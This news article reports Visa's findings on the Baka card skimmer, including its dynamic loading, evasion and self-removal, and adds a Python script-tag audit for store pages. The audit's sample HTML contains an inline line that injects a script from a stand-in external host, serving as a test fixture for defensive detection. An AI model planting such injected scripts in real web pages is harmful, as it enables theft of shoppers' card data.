The new application steals card data and self-destructs

By | September 7, 2020

Bank cards, and the money on them, are threatened by a new attack discovered by experts at the Visa payment system. It is a new electronic skimmer that can stealthily steal card data. What sets it apart from similar software is that it self-destructs after it reaches its goal. Visa has already issued an official statement warning of its existence.

The Baka skimmer was first discovered in February 2020, according to Visa. Experts note that it was written by an experienced and extraordinary programmer. This can be judged, for example, by its extended design and the greater number of functions it performs, as well as by the uniqueness of the loader it uses and the way it conceals itself on user devices. Regular static antivirus scanners cannot find it, because it is loaded dynamically and is therefore not visible to them.

A new encryption is used in each new case, which further complicates detection. In addition, if the application notices the launch of a dynamic scan (used by the developers), it automatically removes itself from the machine's memory. Between February and the present, the company's specialists managed to find it on the servers of several online stores, where it had been uploaded using a script tag.

After some time, the skimming code was downloaded from the C&C server and then executed in memory. This approach makes it practically impossible to detect the threat even with a thorough analysis of files, both on the store's server and on the buyer's computer.
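Since the article says the skimmer reached store pages through a script tag, one check a store operator can run is to list every script a checkout page references and flag sources outside an allowlist, third-party scripts without a Subresource Integrity hash, and inline code that creates further script elements. This is an added example, not code from Visa or from the original article; the hostnames, the allowlist and the sample HTML are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: script hosts the store operator has approved (hypothetical names).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.payments.example"}

# Constructed sample of a served checkout page; not taken from the article.
SAMPLE_HTML = """<html><head>
<script src="/static/cart.js"></script>
<script src="https://js.payments.example/sdk.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://cdn.unknown-host.example/jquery.min.js"></script>
<script>var s=document.createElement('script');s.src='//x.example/a.js';document.head.appendChild(s);</script>
</head><body></body></html>"""

class ScriptAudit(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.findings, self._inline = page_host, [], None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attr = dict(attrs)
        src = attr.get("src")
        if src is None:              # inline script: collect its body
            self._inline = []
            return
        host = urlparse(src).hostname or self.page_host  # relative URL = own host
        if host not in ALLOWED_SCRIPT_HOSTS:
            self.findings.append(("unlisted-host", src))
        elif host != self.page_host and not attr.get("integrity"):
            self.findings.append(("no-sri", src))  # third party without SRI hash

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline)
            # Inline code that creates further script elements loads code at run time.
            if "createElement" in body and "script" in body:
                self.findings.append(("inline-injector", body.strip()[:60]))
            self._inline = None

def audit(html, page_host):
    parser = ScriptAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings
```

The audit only covers script references present in the served HTML; the skimming code itself, which the article says is downloaded afterwards and executed in memory, never appears there.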

Advice: to pay for purchases in online stores, use virtual intermediary cards, or limit the ability to pay for online purchases immediately after the financial transaction.